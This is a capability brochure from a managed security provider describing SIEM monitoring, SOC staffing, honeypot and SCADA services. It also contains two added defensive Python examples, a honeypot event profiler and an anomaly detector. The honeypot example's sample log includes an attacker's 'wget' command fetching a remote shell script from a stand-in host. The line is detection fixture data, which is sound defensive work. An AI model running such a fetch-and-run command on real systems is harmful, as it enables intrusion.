Security | Engineering | Technology
INFORMATION SECURITY
MANAGED SECURITY SERVICES
PROFESSIONAL SECURITY SERVICES
COMPLIANCE CONSULTING
CONTENTS
Solutions & Services  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 1
Managed Security Services .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 2
Managed Firewall & Managed SIEM .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 4
SOC-in-a-Box  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 6
Assisted SOC Services  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 8
Customer dashboards .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 10
White Labeled Managed Services  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 12
Advanced Threat Protection and Malware Detection  . 14
Managed Honeypot Active Defense  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 16
Managed SCADA Security  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 17
Continuous Threat Defense Service
Machine Learnt Behavioural Anomalytics .  .  .  .  .  .  .  .  .  .  . 18
Benefits of Engaging an MSS Provider .  .  .  .  .  .  .  .  .  .  .  .  .  . 20
Si CSIRT Teams .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 22
Professional Security Services .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 24
Vulnerability Assessments  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 26
Penetration Testing  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 27
Web Application Security Testing .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 28
Network Risk Assessments .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 29
Firewall Migration Services .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 30
Network Architecture Review  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 31
BYOD .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 32
Compliance Consulting .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 34
ISMS - ISO 27001 .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 36
BCP & Management .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 37
PCI Compliance & PCIS .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 38
Compliance & Security Skills Training .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 39
Contact Us .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 40
OBJECTIVE
Born out of a common vision... “we deliver to our clients the very best security services by using innovation,
professionalism and our depth of expertise.”
We deliver on our promise to enhance our clients’ information security posture, lower their total cost of ownership and
demonstrate compliance through our managed security and professional services, day in, day out 24 x 7.
Managed Services
•	 Managed IDS & IPS
•	 Firewall management
•	 Managed application firewall
•	 Log monitoring
•	 Log retention
•	 SIEM as a service
•	 CSIRT (Computer Security Incident Response)
Professional Services
•	 Vulnerability management & testing
•	 Penetration testing
•	 Web application security
•	 Network risk assessment
•	 Device configuration & mitigation reviews
•	 Cyber forensics
•	 BYOD
Compliance
•	 PCI consulting
•	 PCI scanning
•	 ISO 27001
•	 Policies & procedures
•	 ITIL readiness & training
•	 Business continuity planning
About Us
Si is driven by a desire to offer our clients the highest degree of protection against today’s cyber threats. We do this by delivering
the most customizable approach to security managed services available and by providing a highly tailored and responsive
approach for each client. We protect all IT assets including virtual assets, cloud and traditional infrastructure using our team of
over 150 dedicated security experts from our Security Operations Centres in London, New York, Dubai and Mumbai.
Established in 2003 with over a decade in Security and Cyber Security consulting and management services, our objective is
to place the power of our SOC team into our clients’ hands to provide complete visibility of security events and threats within
their environments. Our aim is to become an extension of our clients’ internal teams as a trusted partner.
Why Us?
•	 Dedicated security specialists
•	 Global SOCs across 4 continents
•	 Powered by industry best technology
•	 Powered by industry experts and analysts
Solutions & Services
Si provides Managed Security and Professional Security Consulting services to thousands of end customers. Our delivery
model utilizes a cloud based information security and compliance solution, which requires no capital expenditure from our
clients and is accessible via a secure and innovative customer platform.
“Establish a monitoring strategy and develop supporting policies,
taking into account previous security incidents and attacks, and
your organisation’s incident management policies. Continuously
monitor inbound and outbound network traffic to identify unusual
activity or trends that could indicate attacks and the compromise
of data”
Extract from “10 Steps to Cyber Security”, CESG, the information security arm of GCHQ
We provide the following Managed Security Services:
•	 Design of security operations centres (SOCs)
•	 Onsite operation of our clients’ SOCs
•	 White labeled MSSP solutions
•	 A cloud based managed firewall + SIEM service
•	 On demand Security Incident Response Teams (SIRT)
Si enhances the operational efficiency of our clients’ information systems with our Managed Security Services. By optimizing
IT asset utilization, risk management and compliance we improve uptime and availability.
We design, build and operate security operation centres either onsite at our customers’ locations or in the cloud through our
network of security operation centres.
We have built and we operate security operation centres across London, New York, Dubai and Mumbai. This gives us a
proactive 360° view of global threats.
We are dedicated to serving a range of customers across
verticals such as financial services, telecoms, retail and
healthcare with 80% of our global clients comprising
blue-chip Fortune 500 and Government organisations.
Services Description
Managed Firewall: 24x7 monitoring and managing of customers’ security devices (FW, IPS, UTM, WAF and more)
Managed SIEM: 24x7 monitoring of customer assets and event correlation (network, servers, apps, databases, FW, IPS)
Advanced Threat Protection and Malware Detection: Supply & management of advanced next generation FWs, IPSs and malware detection probes with advanced correlation
Managed SCADA Security: Supply and management of SCADA firewalls for critical infrastructure, oil & gas
Advanced Threat Management: Supply and correlation of commercial threat feeds (e.g. Norse)
Managed Vulnerability Management: Vulnerability management
Honeypot Active Defense: Active defense utilising honeypot infrastructure correlated with SIEM for proactive management
Managed Web Application Firewall: Supply & management of web application firewalls utilising Citrix NetScaler for defense of web environments
Continuous Threat Defense: Advanced behaviour analysis using CyberFlow Anomalytics to detect malicious activity
SOC-in-a-Box + 24x7 Monitoring: Supply & management of SOC infrastructure onto a customer site including the 24x7 monitoring of all event sources
SOC Staffing Outsource - Onsite: Onsite provision of staffing to monitor, administer and manage customer deployed and owned SOC infrastructure and event sources
SOC Staffing Outsource - Offsite: Offsite provision of staffing to monitor customer deployed and owned SOC infrastructure and event sources
INFORMATION SECURITY | CAPABILITY STATEMENT | 5
Managed Firewall & Managed SIEM
Managing and monitoring security devices is a highly skilled operation that can be a time consuming and resource intensive
process. Our managed security services allow our clients to focus on their core business while we concentrate on providing
secured networks and systems.
The service we offer is 24x7 and is scalable, compliant and cost effective. This service is designed for banking, government and
enterprise clients that wish to outsource SIEM services against strict SLAs and compliance requirements.
With over 20,000 devices under management, our cloud based service is secured across our redundant global SOCs and offers
a resilient and dependable service.
Summary Features
Managed Firewall & Managed SIEM:
•	 24x7 Security Monitoring
•	 In Country Log Retention
•	 Real Time Incident Response
•	 Advanced Event Correlation
•	 Event Storage For Forensic Analysis
•	 ISO 27001, SANS 20 Compliance Reports
•	 15 Minute SLA Response Time
•	 SIEM Powered By LogRhythm
•	 Web Based Customer Dashboards
•	 Policy & Signature Configuration Changes
•	 Weekly Reports: Performance, Availability & Threat Management
What do we manage?
Servers & System OS, Applications & Databases:
•	 Managed Servers (Windows, Linux, Unix, ESX)
•	 Applications
•	 Databases
•	 Email Servers
Core Network Equipment:
•	 Network Routers / Switches
•	 Network Wireless LAN
•	 Network Load-Balancers / Accelerators
Network Security Equipment:
•	 Managed Firewalls
•	 Managed Network IDS or IPS
•	 Managed Network VPN Routers
•	 Managed Network AntiSpam / Proxies
•	 Managed UTMs
Firewall / IDS / IPS / Network Devices / Server
Security Services Feature Set (Monitor / Manage)
Threat Management:
•	 24x7 Proactive Security Incident Monitoring, Detection & Notification
•	 SIEM & Correlation
•	 Security Policy Consultation
•	 Incident Management
Configuration Management:
•	 Maintain Device Inventory Database
•	 Backup of Device Configuration
Fault Management:
•	 Availability Monitoring
•	 Fault Detection & Notification
•	 Fault Diagnosis & Resolution
•	 Vendor Management
Change Management:
•	 Maintain Documentation
•	 Policy & Signature Configuration Changes
•	 OS Updates, Patches & Signatures
•	 Maintain CMDB
•	 Operating System Upgrades
Reporting:
•	 Basic Reporting
•	 Advanced Reporting
Web Portal:
•	 Web Based Portal
•	 Access to Threat Feeds
Log Retention:
•	 120 days online log retention
•	 12 months archival (Customisable)
Service architecture diagram (image not reproduced): the customer network (managed firewall / UTM / IDS, managed server, business application monitoring, managed switch / router) connects over a secure VPN to the Global Security Operations Center; the SOC sits in a Tier 3 co-location data centre, reached over a secure VPN, and all logs stay in country.
SOC-in-a-Box
Si recognises that many clients have a business demand to locate our Security Operations Centre on their premises
/ data centres. We offer a rapid deployment solution to enable our clients to become operational in a matter of
days including people, processes and technology components. At the heart of the SOC lies an industry leading SIEM
(LogRhythm Security Analytics Platform) that is closely coupled with additional modules which may be added at the
customer request to include full SOC functionality.
Technology Elements
Our SOC-in-a-Box deployment represents an agnostic approach to the component architecture and provides the choice
of vendor to our customers from the following matrix.
People (Staffing) Elements
The heart of an effective SOC operation is the quality of staffing together with
robust and tested SOC policies and processes. In all cases, a 24x7 SOC operation
is required to ensure a continuous level of monitoring and defence and whilst
this can be cost prohibitive for many organisations we offer three options to
achieve this objective.
Options: Staffing
Option 1: Remote 24x7 monitoring from our Global Security Operations Centre.
Option 2: Onsite 24x7 monitoring at our customer’s site location
Option 3: Hybrid – Onsite (8x5) team, offsite (evening shift, weekends and public holidays)
In all cases we ensure that all security logs stay onsite at the customer’s SOC infrastructure.
SOC Component Technology
Core Component: LogRhythm Security Analytics Platform
Module 1: Incident Response Workflow Handling - Request Tracker
Module 2: Vulnerability Management - Rapid7, Nessus or Qualys
Module 3: Advanced Threat Defence - Palo Alto, Cisco Sourcefire or ThreatTrack
Module 4: Advanced Threat Intelligence - Norse
Module 5: Honeypot Active Defence - Honeypot Infrastructure (HoneyDrive)
Module 6: Web Application Defence - LogRhythm Web Application Defense Suite + Third party WAF (Optional)
Module 7: Continuous Threat Defence - CyberFlow Anomalytics Suite (Anomaly Detection System)
SOC and Incident Response Processes
Si’s team has been designing, operating and consulting on SOC deployments globally for over 10 years and a particular
strength is our ability to develop and optimise SOC and Incident Response processes. Whilst this element is often overlooked
we believe this is the single most important ingredient to consistent successes and predictable results. Our clients will benefit
from this experience when they partner with Si to deliver our SOC-in-a-Box offering.
Service Delivery Architecture
Step 1: Select Technology
•	 Option 1: LogRhythm Onsite – Buy
•	 Option 2: LogRhythm Onsite – Lease
•	 Option 3: SOC-in-a-Box
Step 2: Select Staffing
•	 24x7 Outsource Onsite Team
•	 24x7 Remote Monitoring Offsite Team
•	 24x7 Hybrid Team: Day shift - Onsite Team; Night shift - Remote Offsite
Step 3: Select Processes
•	 Si SOC Processes
•	 Customer SOC Processes
Assisted SOC Services
Empowered SIEM
Technology itself is not enough; an efficient SOC team requires a critical balance of people, process and technology. Si
partners with LogRhythm to empower our customers to leverage their existing SIEM investments by providing a 24 x 7
Monitoring service offering.
The Operational Challenge
SOC ops require highly skilled security
professionals to investigate security
incidents, perform incident response and
forensics and help keep an organization
afloat amid a data breach.
An enterprise looking to operate a SOC needs
to evaluate whether it has the expertise
in-house to deliver effective monitoring. The
option is to transfer the risk to a specialist
SOC operator and we provide services to
support these challenges.
ASSISTED SOC SERVICES
Key Questions
Does outsourcing make sense?
It does when expertise is not available in-house, or when budget
does not allow for investment needed to employ, house, and train a
24 x 7 SOC team.
Can building a self-contained, well-staffed SOC become cost-prohibitive for many?
The answer is yes primarily due to the resource cost of providing a
24x7 team, after all cyber never sleeps! However if budget does not
allow for an onsite team then a remote service to deliver log analysis
and event monitoring can be an economical option.
Service Level Assurance
All services are backed by an SLA:
Incidents - 15 minute response
Availability - 99.999% uptime
Change Management - 4 hr MTTR
Security Services Feature Set (Monitor)
Threat Management:
•	 24x7 Proactive Security Incident Monitoring, Detection & Notification
•	 SIEM Event Management & Correlation
•	 Security Policy Consultation
Configuration Management:
•	 Maintain Device Inventory Database
•	 Backup of Device Configuration
Fault Management:
•	 Availability Monitoring
•	 Fault Detection & Notification
Change Management: Maintain Documentation
Reporting: Reporting
Web Portal:
•	 Web Based Portal
•	 Access to Threat Feeds
Log Retention: Log Management and Archival
SLA:
•	 15 Minute Response Time
•	 Service Credit Backing
Dedicated Account Manager: Dedicated technical account manager
Benefits – Cost & Performance
The adoption of “Assisted SOC” is motivated by three key messages: “Less Cost”, “Increased Performance” and “Service
Assurance (SLA)”. We demonstrate to our customers that we deliver SOC monitoring services better and for less than the cost
of an in-house service.
Sample Use Case – Customer X
A customer requires a 24x7 monitoring service to support their LogRhythm Security Intelligence platform with an average
MPS throughput of 1,000 MPS.
Options
We recognize that not all businesses are the same and so we support the following deployment models:
•	 Onsite SOC Teams
•	 Offsite Remote SOC Team (Remote Monitoring)
•	 Hybrid – Day Shift Onsite / Nightshift Offsite
Cost Assumptions
The following cost assumptions are used for the cost benefit assessment.
SOC Operator (L1):
•	 Salary ($50,000/yr): $4,166 / mth
•	 Overhead (20% Salary): $818 / mth
•	 Desk Space: $921 / mth
•	 Others: $767 / mth
•	 Total Cost to Employ: $6,672 / mth
Note that a 24x7 operation requires a 5 shift model and a minimum of 5 dedicated SOC operators.
Cost Comparison – Customer X
In house team:
•	 Cost / mth of 24x7 monitoring team: 5 x $6,672 = $33,360
•	 Performance + skills level: difficult to achieve with in house team
•	 SLA response: ? Difficult to track and manage
•	 Result: expensive, no service guarantee + performance risk + staff risks
Si remote outsource team:
•	 Cost / mth of 24x7 monitoring team: $7,000
•	 Performance + skills level: Si dedicated security professionals
•	 SLA response: 15 minute response
•	 Result: less cost + better service assurance
Customer Dashboards
Si’s customer dashboards offer end-to-end support to the operations of SOCs and Managed Security Service Providers (MSSP).
It has unique features to help Service Providers setup their operations in minimum time.
Unified Interface for Operations
Si provides a unified interface for the monitoring &
management of one or more networks for multiple aspects.
The portal is able to collate & analyse customer logs & data
and integrates security intelligence tapped from global
sources with analytical tools.
Customer specific information:
•	 Customer account information
•	 Security incidents & events
•	 Availability of critical hosts and services
•	 Performance of vital systems and network interfaces
•	 Vulnerabilities on critical systems and applications
•	 Incident & change management
High Scalability & Technology Agnostic
Si’s customer dashboards are highly scalable and can
integrate with almost any Java, ASP or Web based
application:
•	 Technology agnostic interface to normalized
information
•	 Improved operational efficiency through ease of
analysis & automation
•	 Enhanced Web 2.0 features for user collaboration
•	 Flexibility to integrate with other security & network
products and appliances
Vulnerability Posture Dashboard
A high level view of the security posture across an enterprise based on scans performed on
the infrastructure, patch level, misconfigurations and categorisation of vulnerability.
Service Management
Management and tracking of performance against service level agreements.
Knowledge Base
Database of over 100,000 vulnerabilities and 15,000 signatures, with in-built correlation
engine to assist incident management and forensics.
Security News Feeds
Current security trends and news feeds validated in real-time through various sources and
security advisory organizations.
Security Incident Management
Complete tracking of incident handling through a triage of identification, prioritization
and remediation.
Customizable Dashboard
The customizable dashboard presents an overview of security incidents across the
enterprise. Key statistics of infrastructure areas that either require more attention or events
that provide a larger picture.
Service Centre
Service centre for opening, tracking and drill downs from incident details to resolution.
Single portal for change management.
Security Threat Analysis
The Dashboard provides a high level summary of how incidents are categorized based on
their severity and the location that needs more attention.
Non-customer specific information:
•	 Integrated analytical tools for forensic analysis
•	 Access to reliable security intelligence
•	 Geographical information
White Labeled Managed Services
We provide a service that allows our Partners to re-sell our managed security services as a white labeled service. Our process
& technology allow our Partners to deliver ‘in the cloud’ IT services, with no capital investment, to provide a world class, 24x7
managed security service. Si takes care of the technology and the expertise using our global operations centres allowing our
partners to take care of their customers’ security needs.
Customer Platform
Our partners benefit from our innovative Customer Platform that enables complete account management for reporting,
ticketing, fault management, threat & vulnerability management, customized dashboards, news and knowledge base.
Our web user interface sets the benchmark globally for customer interfacing and allows both partners & end customers a live
360° view of their assets, service fulfilment and SLA performance.
Platform screenshot callouts (image not reproduced): customised with our end customer’s logo; customised with our partner’s logos and colours; news, dashboards & knowledge base; reliant & proactive analytics & reports; complete SLA management & incident workflows; drag and drop dashboard builder; easily customisable dashboards; Global Security Operation Centres; easy change request workflows.
Our clients’ end customers benefit from our unique multi-
service delivery platform that can customize the services
they like to offer, define the look and feel and set up their
SLA support and escalation procedures.
Our MSSP partners are traditionally telecoms operators
and security hardware vendors who seek to offer managed
services to their existing client base.
MSSP Services
We can facilitate our partners to provide their end
customers with:
•	 Managed firewall
•	 Managed UTM and IDS
•	 Managed switch and router
•	 Application management
•	 Vulnerability management
•	 Threat management
•	 Fault management
Report screenshot callout (image not reproduced): one click management reports.
Advanced Threat Protection and Malware Detection
Si defends our customer networks against threats by using a market leading Next Generation Intrusion Prevention
System and deep integration into our SIEM platform (Powered by LogRhythm) to provide multi-dimensional behavioural
analytics, extended visibility and continuous monitoring for real-time threat detection & response.
The Next Generation Firewalls which we support or supply include:
•	 Palo Alto
•	 Cisco Sourcefire
•	 ThreatTrack
•	 Fortinet
Summary Features
The feature set summary is provided as follows:
•	 24 x 7 monitoring & management
•	 Real time incident response system
•	 Advanced malware protection & next generation IPS
•	 Packet level forensics and sandboxing
•	 Network behaviour analysis
•	 Integration with our next Gen SIEM for behavioural analytics
•	 Behavioural whitelisting
•	 Statistical baselining
•	 Real-time threat management
•	 Continuous Compliance
•	 Host & network forensics
•	 Real-time contextual awareness
Use case
LogRhythm incorporates Next Gen FW security and advanced malware protection via the secure eStreamer API
and correlates it against other security device and machine logs to deliver multi-dimensional behavioural analytics,
extended visibility and continuous monitoring for real-time threat detection & response.
The integration provides:
•	 Deeper visibility and contextual awareness into network events with advanced correlation to deliver enterprise-wide
threat detection
•	 Threat intelligence to help detect advanced malware attacks and realize the extent of the outbreak for fast
remediation
•	 Automated action against advanced persistent threats (APT) and zero-day attacks
•	 Unparalleled expertise through Si SOC Team, LogRhythm Labs™ and Sourcefire’s Vulnerability Research Team (VRT)
Service benefits:
•	 No Capex investment required
•	 Detect advanced malware and realize outbreak
extents for fast remediation
•	 Automated and immediate action against
threats such as APT and zero-day attacks
•	 Multi-dimensional behavioural analytics
•	 24 x 7 monitoring + real time event
contextualization
Service Architecture
Si partners with leading Next Generation Firewall vendors (Palo Alto, Sourcefire or ThreatTrack) to incorporate their
advanced threat detection technology and sandboxing with our SIEM platform (Powered by LogRhythm) and correlates
it against other security devices and machine data throughout the IT environment.
Managed Honeypot Active Defense
A honeypot is a security resource deliberately designed to be probed, attacked and compromised, for the purpose of gathering
intelligence around an attacker. By using honeypots to create better context around threats, we are able to provide a more
proactive defence posture. Our automated and integrated approach to honeypots eliminates the need for the manual review
and maintenance associated with traditional honeypot deployments.
Managed SCADA Security
Today, remotely deployed field devices and SCADA systems are increasingly brought into the IT environment and communicate
over IP. This convergence of Operational Technology (OT) and Information Technology (IT) has opened up new points of attack
or “threat vectors” for hackers.
Si has countered this threat by providing SCADA firewall technology which is integrated into our SIEM (Powered by
LogRhythm) for 24x7 monitoring, threat and incident detection.
The service is delivered using Palo Alto Networks SCADA Firewall, which is one of the only Layer 7 firewalls available for
SCADA-based environments.
Service Features
•	 Secure critical infrastructure, power grids, oil/gas pipelines, industrial plant
•	 Supports - DNP3, Modbus/TCP, Ethernet IP, IEC 61850, PROFINET and BACnet
•	 Layer 7 application protection and analysis for Industrial Control systems language and traffic
•	 Strong policy enforcement for more granular control over industrial data inputs
•	 Uniform secure access from control networks to sensors
•	 Translation of SCADA data formats into IP protocols
•	 SIEM integration and robust event logging
•	 All security logs remain in country
•	 Real time incident response system
•	 Real time events from the Firewall
•	 Store the events for forensic analysis
•	 Customisable event correlation
How It Works
Si deploys honeypot infrastructure into customer
DMZ environments to analyse malicious events
by continuously monitoring honeypot event
activity utilising our SIEM platform (Powered by
LogRhythm).
We perform real-time, advanced analytics on
all activity captured in the honeypot, including
successful logins, observed successful attacks and
attempted/successful malware activity on the host
and use this data to create a defensive posture.
1. Deploy a honeypot specific to the customer requirement.
2. The SIEM (Powered by LogRhythm) tracks the attacker’s actions.
3. Analyse the honeypot data to create profiles of behavioural patterns and attack methods.
4. Apply a defensive posture for the detected profiles and signatures.
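Steps 2 to 4 of the workflow above (track the attacker’s actions, build behavioural profiles, derive a defensive posture) can be made concrete with a small script. This is an added example, not Si’s, LogRhythm’s or HoneyDrive’s code: the key=value log format, the field names, the severity thresholds and the sample events (including the placeholder hash) are all constructed for illustration.

```python
"""Honeypot event profiling and defensive-posture derivation.

Added illustration of the honeypot workflow; not Si's, LogRhythm's or
HoneyDrive's code. The log format, field names and scoring thresholds
are assumptions made for this example.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed honeypot event lines in a key=value format (assumed format).
SAMPLE_LOG = """\
2015-03-02T10:01:02Z src=203.0.113.7 event=login user=root result=fail
2015-03-02T10:01:05Z src=203.0.113.7 event=login user=admin result=fail
2015-03-02T10:01:09Z src=203.0.113.7 event=login user=root result=success
2015-03-02T10:01:15Z src=203.0.113.7 event=cmd input="wget http://198.51.100.9/x.sh"
2015-03-02T10:01:20Z src=203.0.113.7 event=download url=http://198.51.100.9/x.sh sha256=PLACEHOLDER_HASH
2015-03-02T10:02:00Z src=192.0.2.44 event=login user=pi result=fail
2015-03-02T10:02:03Z src=192.0.2.44 event=login user=pi result=fail
2015-03-02T10:09:00Z src=198.51.100.200 event=scan port=23
"""

# key=value pairs; values may be double-quoted to allow spaces.
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_events(text):
    """Parse each line into a dict; the leading token is the timestamp."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, _, rest = line.partition(" ")
        ev = {"ts": ts}
        for key, val in KV_RE.findall(rest):
            ev[key] = val.strip('"')
        events.append(ev)
    return events


@dataclass
class Profile:
    """Per-source behavioural profile built from honeypot activity."""
    failed_logins: int = 0
    successful_logins: int = 0
    usernames: set = field(default_factory=set)
    commands: list = field(default_factory=list)
    downloads: list = field(default_factory=list)
    scanned_ports: set = field(default_factory=set)

    def severity(self):
        # Thresholds are assumptions; rank by how far the attacker got.
        if self.downloads:
            return "critical"   # a payload was retrieved onto the decoy
        if self.successful_logins:
            return "high"       # interactive access was obtained
        if self.failed_logins >= 2:
            return "medium"     # credential guessing
        return "low"            # reconnaissance only


def build_profiles(events):
    """Step 3: aggregate tracked actions into one profile per source."""
    profiles = defaultdict(Profile)
    for ev in events:
        p = profiles[ev["src"]]
        kind = ev.get("event")
        if kind == "login":
            p.usernames.add(ev["user"])
            if ev["result"] == "success":
                p.successful_logins += 1
            else:
                p.failed_logins += 1
        elif kind == "cmd":
            p.commands.append(ev["input"])
        elif kind == "download":
            p.downloads.append({"url": ev["url"], "sha256": ev.get("sha256")})
        elif kind == "scan":
            p.scanned_ports.add(int(ev["port"]))
    return dict(profiles)


def derive_posture(profiles):
    """Step 4: turn profiles into SIEM-ready artefacts - sources to block,
    payload indicators to blocklist, and usernames worth alerting on if
    they ever appear in production authentication logs."""
    posture = {"block_sources": [], "payload_indicators": [],
               "watch_usernames": set(), "severity": {}}
    for src, p in sorted(profiles.items()):
        sev = p.severity()
        posture["severity"][src] = sev
        if sev in ("critical", "high"):
            posture["block_sources"].append(src)
        posture["payload_indicators"].extend(p.downloads)
        posture["watch_usernames"] |= p.usernames
    return posture


if __name__ == "__main__":
    result = derive_posture(build_profiles(parse_events(SAMPLE_LOG)))
    for src, sev in result["severity"].items():
        print(f"{src:16} {sev}")
    print("block:", result["block_sources"])
    print("payload indicators:", result["payload_indicators"])
```

The output of `derive_posture` is what a SIEM integration would consume: the block list feeds a firewall policy, the payload indicators feed a web proxy or hash blocklist, and the username set becomes a correlation rule against production login events.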
The Honeypot Security Analytics Suite
delivers:
•	 Continuous monitoring of honeypot data
•	 Customized threat research for
strategic defence
•	 Automated breach prevention and response
•	 Dynamic security intelligence
•	 Real time monitoring
•	 Low cost approach for customer
specific signatures
•	 Fault management
Service benefits:
•	 Secure critical infrastructure, power grids, oil/
gas pipelines, industrial plant
•	 No Capex investment required
•	 24 x 7 Monitoring
•	 Secure SCADA Networks
•	 Minimise business risk of security breaches
•	 Achieve compliance requirements
•	 Strict SLA response
The customer will interface with the MSSP SOC team via the customer portal where he will have customer access to:
•	 SLA Tracking
•	 Ticketing & troubleshooting
•	 Threat Management Dashboards
•	 Knowledge base for incident response and analytics
Continuous Threat Defense Service
Machine Learnt Behavioural Anomalytics
Si partners with CyberFlow Analytics™ to provide a service that detects operational anomalies within packet communication
behaviour to determine high risk activities and threats. The system is the only system that can provide “Anomalytics”, a
real-time, streaming, machine-learning, behavioural analytics solution, which can instantly detect and alert operational and
security practitioners of anomalous and suspicious activities within their organizations.
This system and service uses Anomalytics to provide real-time cyber-security threat detection at scale and in situations where
traditional security products are failing to adequately identify and detect advanced polymorphic attacks and other anomalous
lateral behaviour within their organizations.
How it Works
•	 Collects raw packet meta data
•	 Machine learns normal packet communication
behaviour of clients, servers, protocols and
visualizes anomalous high risk threats
•	 Finds operational anomalies such as SNMP
event storms, odd port/app activity and changes
in IoT sensor communications
•	 Automation of clustered breach activity tracks
Advanced Persistent Threats (APTs)
•	 Uses a SPAN port configuration to collect data
•	 Operates within VMs on any customer
virtualized infrastructure (lightweight data
footprint)
Service Benefits:
•	 It is able to monitor traffic effectively over
the entire network, as opposed to traditional
security products which monitor only
segments of a network
•	 The service can detect APTs which other
analytics methods cannot capture
•	 Cost effective and scalable
•	 Real time monitoring
•	 Integrated with SIEM
1. Deploy a virtual machine network, app and device sensors that monitor systems to feed the “Anomalytics Fusion Engine”.
2. Execute multiple, real-time analytical models to construct self-organizing maps which present high risk behaviour.
3. Cross-correlate the maps against a behavioural policy framework.
4. We correlate the real-time anomaly threat detection and alerts through our SIEM to drive rapid incident response and forensics.
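As an added illustration of the “learn normal, flag deviation” idea behind steps 1 to 4, the following script learns a per-service packet-rate baseline from flow metadata and then flags an SNMP event storm and a port with no history in the baseline (two of the anomaly classes named in “How it Works”). It is not CyberFlow’s Anomalytics engine, whose models are proprietary: a per-minute z-score baseline stands in for the vendor’s machine-learning models, and the `Flow` records are constructed.

```python
"""Statistical baseline over packet metadata to flag anomalous behaviour.

Added illustration, not CyberFlow's Anomalytics engine. A per-minute
z-score baseline stands in for the vendor's machine-learning models;
the flow records below are constructed.
"""
from collections import defaultdict
from dataclasses import dataclass
from statistics import mean, pstdev


@dataclass(frozen=True)
class Flow:
    """Aggregated flow metadata for one minute (constructed format)."""
    minute: int
    src: str
    dst: str
    proto: str
    dport: int
    packets: int


def make_sample_flows():
    """Ten minutes of constructed 'normal' traffic plus one live minute."""
    snmp = [48, 52, 50, 49, 51, 50, 52, 48, 50, 50]          # SNMP polls/min
    https = [90, 110, 100, 95, 105, 100, 110, 90, 100, 100]  # HTTPS pkts/min
    baseline = []
    for m in range(10):
        baseline.append(Flow(m, "10.0.0.2", "10.0.0.1", "udp", 161, snmp[m]))
        baseline.append(Flow(m, "10.0.0.5", "10.0.0.9", "tcp", 443, https[m]))
    live = [
        Flow(10, "10.0.0.2", "10.0.0.1", "udp", 161, 5000),  # SNMP event storm
        Flow(10, "10.0.0.5", "10.0.0.9", "tcp", 443, 110),   # ordinary HTTPS
        Flow(10, "10.0.0.5", "10.0.0.9", "tcp", 4444, 3),    # port never seen
    ]
    return baseline, live


def learn_baseline(flows):
    """Learn (a) which src/dst/proto/port tuples are normal and (b) the
    per-minute packet-rate distribution of each proto/port service."""
    seen = set()
    per_minute = defaultdict(lambda: defaultdict(int))  # service -> minute -> pkts
    for f in flows:
        seen.add((f.src, f.dst, f.proto, f.dport))
        per_minute[(f.proto, f.dport)][f.minute] += f.packets
    rates = {}
    for service, by_min in per_minute.items():
        samples = list(by_min.values())
        # Floor the deviation so a perfectly flat baseline cannot make
        # every tiny change look like an anomaly.
        rates[service] = (mean(samples), max(pstdev(samples), 1.0))
    return {"seen": seen, "rates": rates}


def detect(flows, baseline, z_threshold=3.0):
    """Return anomalies: tuples never seen in training ('new_service') and
    services whose per-minute packet rate sits more than z_threshold
    standard deviations above the learnt mean ('rate_spike')."""
    anomalies = []
    live_rate = defaultdict(lambda: defaultdict(int))
    for f in flows:
        key = (f.src, f.dst, f.proto, f.dport)
        if key not in baseline["seen"]:
            anomalies.append({"type": "new_service", "minute": f.minute,
                              "detail": key})
            continue  # no rate history exists for an unknown tuple
        live_rate[(f.proto, f.dport)][f.minute] += f.packets
    for service, by_min in live_rate.items():
        mu, sigma = baseline["rates"][service]
        for minute, pkts in by_min.items():
            z = (pkts - mu) / sigma
            if z > z_threshold:
                anomalies.append({"type": "rate_spike", "minute": minute,
                                  "detail": service, "z": round(z, 1)})
    return anomalies


if __name__ == "__main__":
    base, live = make_sample_flows()
    model = learn_baseline(base)
    for a in detect(live, model):
        print(a)
```

Each anomaly dict is the shape of record step 4 would forward to the SIEM; in production the baseline would be re-learnt on a rolling window and keyed per host as well as per service, which this example keeps flat for clarity.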
Service Architecture
Architecture diagram (image not reproduced): the “Anomalytics Fusion Engine”.
Dashboards
The following image represents a dashboard identifying the high risk traffic occurring within the network utilising
port level analytics.
